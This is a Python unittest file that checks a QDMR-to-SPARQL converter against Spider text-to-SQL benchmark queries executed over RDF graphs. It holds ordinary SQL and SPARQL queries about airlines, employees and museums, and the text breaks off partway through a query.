# SELECT['countries']
# FILTER['#1', 'with car maker']
# DISCARD['#1', '#2']
# PROJECT['name of #REF', '#3']
grounding = {}
grounding[GroundingIndex(0,0,"countries")] = GroundingKey.make_table_grounding("countries")
grounding[GroundingIndex(1,1,"with car maker")] = GroundingKey.make_table_grounding("car_makers")
grounding[GroundingIndex(3,0,"name of #REF")] = GroundingKey.make_column_grounding("countries", "CountryName")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev175(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 175
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# SELECT T1.Id , T1.Maker
# FROM CAR_MAKERS AS T1 JOIN MODEL_LIST AS T2 ON T1.Id = T2.Maker
# GROUP BY T1.Id
# HAVING count(*) >= 2
# INTERSECT
# SELECT T1.Id , T1.Maker
# FROM CAR_MAKERS AS T1 JOIN MODEL_LIST AS T2 ON T1.Id = T2.Maker JOIN CAR_NAMES AS T3 ON T2.model = T3.model
# GROUP BY T1.Id
# HAVING count(*) > 3
correct_sparql_query = textwrap.dedent("""\
SELECT ?car_makers ?Maker
WHERE
{
?car_makers arc:car_makers:Maker ?Maker.
{
SELECT ?Maker (count(?model_list) AS ?count)
WHERE
{
?car_makers_1 arc:car_makers:Maker ?Maker.
?Maker_2 arc:model_list:Maker:car_makers:Id ?car_makers_1.
?model_list arc:model_list:Maker ?Maker_2.
}
GROUP BY ?Maker
}
FILTER(?count >= 2).
{
SELECT ?Maker (count(?car_names) AS ?count_1)
WHERE
{
?car_makers_2 arc:car_makers:Maker ?Maker.
?Maker_4 arc:model_list:Maker:car_makers:Id ?car_makers_2.
?model_list_1 arc:model_list:Maker ?Maker_4.
?model_list_1 arc:model_list:Model ?Model_1.
?Model arc:car_names:Model:model_list:Model ?Model_1.
?car_names arc:car_names:Model ?Model.
}
GROUP BY ?Maker
}
FILTER(?count_1 > 3).
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
qdmr.args[-1] = ["#9", "#8"]
# break_program:
# SELECT['car makers']
# PROJECT['the models that #REF produce', '#1']
# GROUP['count', '#2', '#1']
# COMPARATIVE['#1', '#3', 'is at least 2']
# PROJECT['the car makers that #REF produce', '#1']
# GROUP['count', '#5', '#1']
# COMPARATIVE['#1', '#6', 'is more than 3']
# INTERSECTION['#1', '#4', '#7']
# PROJECT['the ids of #REF', '#8']
# UNION['#9', '#8']
grounding = {}
grounding[GroundingIndex(0,0,"car makers")] = GroundingKey.make_column_grounding("car_makers", "Maker")
grounding[GroundingIndex(1,0,"the models that #REF produce")] = GroundingKey.make_table_grounding("model_list")
grounding[GroundingIndex(3,2,"is at least 2")] = GroundingKey.make_comparative_grounding(">=", "2")
grounding[GroundingIndex(4,0,"the car makers that #REF produce")] = GroundingKey.make_column_grounding("car_names", "MakeId")
grounding[GroundingIndex(6,2,"is more than 3")] = GroundingKey.make_comparative_grounding(">", "3")
grounding[GroundingIndex(8,0,"the ids of #REF")] = GroundingKey.make_column_grounding("car_makers", "Id")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev183(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 183
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# Question: List all airline names and their abbreviations in ""USA"
# SELECT Airline , Abbreviation FROM AIRLINES WHERE Country = "USA"
correct_sparql_query = textwrap.dedent("""\
SELECT ?Airline ?Abbreviation
WHERE
{
?airlines arc:airlines:Airline ?Airline.
?airlines arc:airlines:Abbreviation ?Abbreviation.
?airlines arc:airlines:Country ?Country.
FILTER(?Country = "USA")
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['airlines']
# PROJECT['names of #REF', '#1']
# PROJECT['abbreviations of #REF', '#2']
# UNION['#2', '#3']
# FILTER['#4', 'in USA']
grounding = {}
grounding[GroundingIndex(0,0,"airlines")] = GroundingKey.make_table_grounding("airlines")
grounding[GroundingIndex(1,0,"names of #REF")] = GroundingKey.make_column_grounding("airlines", "Airline")
grounding[GroundingIndex(2,0,"abbreviations of #REF")] = GroundingKey.make_column_grounding("airlines", "Abbreviation")
grounding[GroundingIndex(4,1,"in USA")] = GroundingKey.make_comparative_grounding("=", "USA", GroundingKey.make_column_grounding("airlines", "Country"))
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_switch_filter_to_comparative(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 183
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# Question: List all airline names and their abbreviations in ""USA"
# SELECT Airline , Abbreviation FROM AIRLINES WHERE Country = "USA"
correct_sparql_query = textwrap.dedent("""\
SELECT ?Airline ?Abbreviation
WHERE
{
?airlines arc:airlines:Airline ?Airline.
?airlines arc:airlines:Abbreviation ?Abbreviation.
?airlines arc:airlines:Country ?Country.
FILTER(?Country = "USA")
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
qdmr.ops[-1] = "comparative"
qdmr.args[-1] = ["#4", "#4", "in USA"]
# break_program:
# SELECT['airlines']
# PROJECT['names of #REF', '#1']
# PROJECT['abbreviations of #REF', '#2']
# UNION['#2', '#3']
# COMPARATIVE['#4', '#4','in USA']
grounding = {}
grounding[GroundingIndex(0,0,"airlines")] = GroundingKey.make_table_grounding("airlines")
grounding[GroundingIndex(1,0,"names of #REF")] = GroundingKey.make_column_grounding("airlines", "Airline")
grounding[GroundingIndex(2,0,"abbreviations of #REF")] = GroundingKey.make_column_grounding("airlines", "Abbreviation")
grounding[GroundingIndex(4,2,"in USA")] = GroundingKey.make_comparative_grounding("=", "USA", GroundingKey.make_column_grounding("airlines", "Country"))
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev237(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 237
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Find all airlines that have flights from both airports 'APG' and 'CVO'.
# SQL:
# SELECT T1.Airline FROM AIRLINES AS T1 JOIN FLIGHTS AS T2 ON T1.uid = T2.Airline WHERE T2.SourceAirport = "APG"
# INTERSECT
# SELECT T1.Airline FROM AIRLINES AS T1 JOIN FLIGHTS AS T2 ON T1.uid = T2.Airline WHERE T2.SourceAirport = "CVO"
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# #1: SELECT['flights']
# #2: FILTER['#1', 'from the airport APG']
# #3: FILTER['#1', 'from the airport CVO']
# #4: PROJECT['airlines of #REF', '#1']
# #5: PROJECT['airlines of #REF', '#2']
# #6: PROJECT['airlines of #REF', '#3']
# #7: INTERSECTION['#4', '#5', '#6']
grounding = {}
grounding[GroundingIndex(0,0,"flights")] = GroundingKey.make_table_grounding("flights")
grounding[GroundingIndex(1,1,"from the airport APG")] = GroundingKey.make_comparative_grounding("=", "APG", GroundingKey.make_column_grounding("flights", "SourceAirport"))
grounding[GroundingIndex(2,1,"from the airport CVO")] = GroundingKey.make_comparative_grounding("=", "CVO", GroundingKey.make_column_grounding("flights", "SourceAirport"))
grounding[GroundingIndex(3,0,"airlines of #REF")] = GroundingKey.make_column_grounding("airlines", "Airline")
grounding[GroundingIndex(4,0,"airlines of #REF")] = GroundingKey.make_table_grounding("airlines")
grounding[GroundingIndex(5,0,"airlines of #REF")] = GroundingKey.make_table_grounding("airlines")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev261(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 261
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Sort employee names by their age in ascending order.
# SQL: SELECT name FROM employee ORDER BY age
# CAUTION: ages of some employees are the same, so there are multiple correct results
# SPARQL and SQL sort differently
# for the sake of this test, we will sort by ID instead
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name
{
?employee arc:employee:Name ?Name.
?employee arc:employee:Employee_ID ?Age.
}
ORDER BY ASC(?Age)""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("employee", "Name"))])
qdmr = get_qdmr_from_break(split_name, i_query)
qdmr.args[3] = ["#2", "#3"]
# break_program:
# SELECT['employees']
# PROJECT['names of #REF', '#1']
# PROJECT['ages of #REF', '#1']
# SORT['#2', '#3']
grounding = {}
grounding[GroundingIndex(0, 0, "employees")] = GroundingKey.make_table_grounding("employee")
grounding[GroundingIndex(1, 0, "names of #REF")] = GroundingKey.make_column_grounding("employee", "Name")
grounding[GroundingIndex(2, 0, "ages of #REF")] = GroundingKey.make_column_grounding("employee", "Employee_ID")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=True,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_non_deterministic_sort(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 261
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Sort employee names by their age in ascending order.
# SQL: SELECT name FROM employee ORDER BY age
# CAUTION: ages of some employees are the same, so there are multiple correct results
# SPARQL and SQL sort differently
# This should be dealed with in the metric
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name
{
?employee arc:employee:Name ?Name.
?employee arc:employee:Age ?Age.
}
ORDER BY ASC(?Age)""")
# correct_sparql_query = QueryToRdf(query=correct_sparql_query,
# output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("employee", "Name")),
# OutputColumnId.from_grounding(GroundingKey.make_column_grounding("employee", "Age"))])
qdmr = get_qdmr_from_break(split_name, i_query)
qdmr.args[3] = ["#2", "#3"]
# break_program:
# SELECT['employees']
# PROJECT['names of #REF', '#1']
# PROJECT['ages of #REF', '#1']
# SORT['#2', '#3']
grounding = {}
grounding[GroundingIndex(0, 0, "employees")] = GroundingKey.make_table_grounding("employee")
grounding[GroundingIndex(1, 0, "names of #REF")] = GroundingKey.make_column_grounding("employee", "Name")
grounding[GroundingIndex(2, 0, "ages of #REF")] = GroundingKey.make_column_grounding("employee", "Age")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=True,
return_message=True,
schema=schema)
self.assertTrue(equal, message)
# in this test, we have three people with the same age:
# ('Lee Mears', '29')
# ('Matt Stevens', '29')
# ('Tim Payne', '29')
# manually switch two confusing entries to ensure thes test never passes accidentally
a_data = None
b_data = None
for i_ in range(len(result_correct.data)):
if result_correct.data[i_][0] == "Tim Payne":
a_data = i_
if result_correct.data[i_][0] == "Matt Stevens":
b_data = i_
self.assertTrue(a_data is not None and b_data is not None, "Something is wrong with the test, could not find entries to swap")
# swap and test again
result_correct.data[a_data], result_correct.data[b_data] = result_correct.data[b_data], result_correct.data[a_data]
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=True,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_sort_by_tuple(self):
"""Test an entry from spider dataset - modify to test sorting item w.r.t. several keys
"""
split_name = "dev"
i_query = 261
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Sort employee names by their age in ascending order.
# SQL: SELECT name FROM employee ORDER BY age
# CAUTION: ages of some employees are the same
# SPARQL and SQL sort differently
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name ?Age
{
?employee arc:employee:Name ?Name.
?employee arc:employee:Age ?Age.
}
ORDER BY ASC(?Age) ASC(?Name)""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("employee", "Name")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("employee", "Age"))])
qdmr = QdmrInstance(["select", "project", "project", "union", "union", "sort"],
[["employees"],
['names of #REF', '#1'],
['ages of #REF', '#1'],
['#2', '#3'],
['#3', '#2'],
['#4', '#5']
])
# break_program:
# SELECT['employees']
# PROJECT['names of #REF', '#1']
# PROJECT['ages of #REF', '#1']
# UNION['#2', '#3']
# UNION['#3', '#2']
# SORT['#4', '#5']
grounding = {}
grounding[GroundingIndex(0, 0, "employees")] = GroundingKey.make_table_grounding("employee")
grounding[GroundingIndex(1, 0, "names of #REF")] = GroundingKey.make_column_grounding("employee", "Name")
grounding[GroundingIndex(2, 0, "ages of #REF")] = GroundingKey.make_column_grounding("employee", "Age")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=True,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev266(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 266
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Find the cities that have more than one employee under age 30.
# SQL: select city from employee where age < 30 group by city having count(*) > 1
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['cities']
# PROJECT['employees of #REF', '#1']
# PROJECT['ages of #REF', '#2']
# COMPARATIVE['#2', '#3', 'is under 30']
# GROUP['count', '#4', '#1']
# COMPARATIVE['#1', '#5', 'is more than one']
grounding = {}
grounding[GroundingIndex(0,0,"cities")] = GroundingKey.make_column_grounding("employee", "City")
grounding[GroundingIndex(1,0,"employees of #REF")] = GroundingKey.make_table_grounding("employee")
grounding[GroundingIndex(2,0,"ages of #REF")] = GroundingKey.make_column_grounding("employee", "Age")
grounding[GroundingIndex(3,2,"is under 30")] = GroundingKey.make_comparative_grounding("<", "30")
grounding[GroundingIndex(5,2,"is more than one")] = GroundingKey.make_comparative_grounding(">", "1")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev353(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 353
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# SQL:
# SELECT DISTINCT T1.template_type_description
# FROM Ref_template_types AS T1 JOIN Templates AS T2 ON T1.template_type_code = T2.template_type_code JOIN Documents AS T3 ON T2.Template_ID = T3.template_ID
# Question: What are the distinct template type descriptions for the templates ever used by any document?
correct_sparql_query = textwrap.dedent("""\
SELECT DISTINCT ?Template_Type_Description
WHERE
{
{
SELECT ?Templates
WHERE
{
?Template_ID arc:Documents:Template_ID:Templates:Template_ID ?Templates.
?Documents arc:Documents:Template_ID ?Template_ID.
}
GROUP BY ?Templates
}
?Templates arc:Templates:Template_Type_Code ?Template_Type_Code.
?Template_Type_Code arc:Templates:Template_Type_Code:Ref_Template_Types:Template_Type_Code ?Ref_Template_Types.
?Ref_Template_Types arc:Ref_Template_Types:Template_Type_Description ?Template_Type_Description.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['templates']
# FILTER['#1', 'used by any documents']
# PROJECT['type description of #REF', '#2']
# FILTER['#3', 'that are distinct']
grounding = {}
grounding[GroundingIndex(0,0,"templates")] = GroundingKey.make_table_grounding("Templates")
grounding[GroundingIndex(1,1,"used by any documents")] = GroundingKey.make_table_grounding("Documents")
grounding[GroundingIndex(2,0,"type description of #REF")] = GroundingKey.make_column_grounding("Ref_Template_Types", "Template_Type_Description")
grounding["distinct"] = ["#4"]
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev367(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 367
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Show all document ids and the number of paragraphs in each document. Order by document id.
# SQL: SELECT document_id , count(*) FROM Paragraphs GROUP BY document_id ORDER BY document_id
qdmr = get_qdmr_from_break(split_name, i_query)
qdmr.args[-1] = ["#5", "#2", "ASC"]
# break_program:
# #1: SELECT['documents']
# #2: PROJECT['document ids of #REF', '#1']
# #3: PROJECT['paragraphs of #REF', '#1']
# #4: GROUP['count', '#3', '#1']
# #5: UNION['#2', '#4']
# #6: SORT['#5', '#2', 'ASC']
grounding = {}
grounding[GroundingIndex(0,0,"documents")] = GroundingKey.make_table_grounding("Documents")
grounding[GroundingIndex(1,0,"document ids of #REF")] = GroundingKey.make_column_grounding("Paragraphs", "Document_ID")
grounding[GroundingIndex(2,0,"paragraphs of #REF")] = GroundingKey.make_table_grounding("Paragraphs")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=True,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev414(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 414
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# SQL:
# SELECT name , Level_of_membership FROM visitor WHERE Level_of_membership > 4 ORDER BY age DESC
# Question: Find the name and membership level of the visitors whose membership level is higher than 4, and sort by their age from old to young.
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name ?Level_of_membership
WHERE
{
?visitor arc:visitor:Level_of_membership ?Level_of_membership.
FILTER(?Level_of_membership > 4).
?visitor arc:visitor:Name ?Name.
?visitor arc:visitor:Age ?Age.
}
ORDER BY DESC(?Age)""")
qdmr = get_qdmr_from_break(split_name, i_query)
qdmr.args[-1] = ["#7", "#6", "from old to young"]
# break_program:
# SELECT['visitors']
# PROJECT['membership levels of #REF', '#1']
# COMPARATIVE['#1', '#2', 'is higher than 4']
# PROJECT['names of #REF', '#3']
# PROJECT['membership levels of #REF', '#3']
# PROJECT['ages of #REF', '#3']
# UNION['#4', '#5']
# SORT['#7', '#6', 'from old to young']
grounding = {}
grounding[GroundingIndex(0,0,"visitors")] = GroundingKey.make_table_grounding("visitor")
grounding[GroundingIndex(1,0,"membership levels of #REF")] = GroundingKey.make_column_grounding("visitor", "Level_of_membership")
grounding[GroundingIndex(2,2,"is higher than 4")] = GroundingKey.make_comparative_grounding(">", "4")
grounding[GroundingIndex(3,0,"names of #REF")] = GroundingKey.make_column_grounding("visitor", "Name")
grounding[GroundingIndex(4,0,"membership levels of #REF")] = GroundingKey.make_column_grounding("visitor", "Level_of_membership")
grounding[GroundingIndex(5,0,"ages of #REF")] = GroundingKey.make_column_grounding("visitor", "Age")
grounding[GroundingIndex(7,2,"from old to young")] = GroundingKey.make_sortdir_grounding(ascending=False)
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=True,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev426(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 426
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# SQL:
# SELECT t1.name FROM visitor AS t1 JOIN visit AS t2 ON t1.id = t2.visitor_id JOIN museum AS t3 ON t3.Museum_ID = t2.Museum_ID
# WHERE t3.open_year < 2009
# INTERSECT
# SELECT t1.name FROM visitor AS t1 JOIN visit AS t2 ON t1.id = t2.visitor_id JOIN museum AS t3 ON t3.Museum_ID = t2.Museum_ID WHERE
# t3.open_year > 2011
# Question: What is the name of the visitor who visited both a museum opened before 2009 and a museum opened after 2011?
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name ?Level_of_membership
WHERE
{
?visitor arc:visitor:Level_of_membership ?Level_of_membership.
FILTER(?Level_of_membership > 4).
?visitor arc:visitor:Name ?Name.
?visitor arc:visitor:Age ?Age.
}
ORDER BY DESC(?Age)""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# #1: SELECT['museums']
# #2: FILTER['#1', 'that opened before 2009']
# #3: FILTER['#1', 'that opened after 2011']
# #4: PROJECT['the visitor of #REF', '#1']
# #5: INTERSECTION['#4', '#2', '#3']
# #6: PROJECT['name of #REF', '#5']
grounding = {}
grounding[GroundingIndex(0,0,"museums")] = GroundingKey.make_table_grounding("museum")
grounding[GroundingIndex(1,1,"that opened before 2009")] = GroundingKey.make_comparative_grounding("<", "2009", GroundingKey.make_column_grounding("museum", "Open_Year"))
grounding[GroundingIndex(2,1,"that opened after 2011")] = GroundingKey.make_comparative_grounding(">", "2011", GroundingKey.make_column_grounding("museum", "Open_Year"))
grounding[GroundingIndex(3,0,"the visitor of #REF")] = GroundingKey.make_table_grounding("visitor")
grounding[GroundingIndex(5,0,"name of #REF")] = GroundingKey.make_column_grounding("visitor", "Name")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_swap_args(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 426
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# SQL:
# SELECT t1.name FROM visitor AS t1 JOIN visit AS t2 ON t1.id = t2.visitor_id JOIN museum AS t3 ON t3.Museum_ID = t2.Museum_ID
# WHERE t3.open_year < 2009
# INTERSECT
# SELECT t1.name FROM visitor AS t1 JOIN visit AS t2 ON t1.id = t2.visitor_id JOIN museum AS t3 ON t3.Museum_ID = t2.Museum_ID WHERE
# t3.open_year > 2011
# Question: What is the name of the visitor who visited both a museum opened before 2009 and a museum opened after 2011?
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name ?Level_of_membership
WHERE
{
?visitor arc:visitor:Level_of_membership ?Level_of_membership.
FILTER(?Level_of_membership > 4).
?visitor arc:visitor:Name ?Name.
?visitor arc:visitor:Age ?Age.
}
ORDER BY DESC(?Age)""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# #1: SELECT['museums']
# #2: FILTER['#1', 'that opened before 2009']
# #3: FILTER['#1', 'that opened after 2011']
# #4: PROJECT['the visitor of #REF', '#1']
# #5: INTERSECTION['#4', '#2', '#3']
# #6: PROJECT['name of #REF', '#5']
grounding = {}
grounding[GroundingIndex(0,0,"museums")] = GroundingKey.make_table_grounding("museum")
grounding[GroundingIndex(1,1,"that opened before 2009")] = GroundingKey.make_comparative_grounding(">", "2011", GroundingKey.make_column_grounding("museum", "Open_Year"))
grounding[GroundingIndex(2,1,"that opened after 2011")] = GroundingKey.make_comparative_grounding("<", "2009", GroundingKey.make_column_grounding("museum", "Open_Year"))
grounding[GroundingIndex(3,0,"the visitor of #REF")] = GroundingKey.make_table_grounding("visitor")
grounding[GroundingIndex(5,0,"name of #REF")] = GroundingKey.make_column_grounding("visitor", "Name")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_intersection_via_double_filter(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 426
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# SQL:
# SELECT t1.name FROM visitor AS t1 JOIN visit AS t2 ON t1.id = t2.visitor_id JOIN museum AS t3 ON t3.Museum_ID = t2.Museum_ID
# WHERE t3.open_year < 2009
# INTERSECT
# SELECT t1.name FROM visitor AS t1 JOIN visit AS t2 ON t1.id = t2.visitor_id JOIN museum AS t3 ON t3.Museum_ID = t2.Museum_ID WHERE
# t3.open_year > 2011
# Question: What is the name of the visitor who visited both a museum opened before 2009 and a museum opened after 2011?
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name
WHERE
{
{
SELECT ?visitor
WHERE
{
{
SELECT ?visitor
WHERE
{
?visitor_ID arc:visit:visitor_ID:visitor:ID ?visitor.
?visit arc:visit:visitor_ID ?visitor_ID.
?visit arc:visit:Museum_ID ?Museum_ID.
?Museum_ID arc:visit:Museum_ID:museum:Museum_ID ?museum.
?museum arc:museum:Open_Year ?Open_Year.
FILTER(?Open_Year < "2009").
}
GROUP BY ?visitor
}
?visitor_ID_1 arc:visit:visitor_ID:visitor:ID ?visitor.
?visit_1 arc:visit:visitor_ID ?visitor_ID_1.
?visit_1 arc:visit:Museum_ID ?Museum_ID_1.
?Museum_ID_1 arc:visit:Museum_ID:museum:Museum_ID ?museum_1.
?museum_1 arc:museum:Open_Year ?Open_Year_1.
FILTER(?Open_Year_1 > "2011").
}
GROUP BY ?visitor
}
?visitor arc:visitor:Name ?Name.
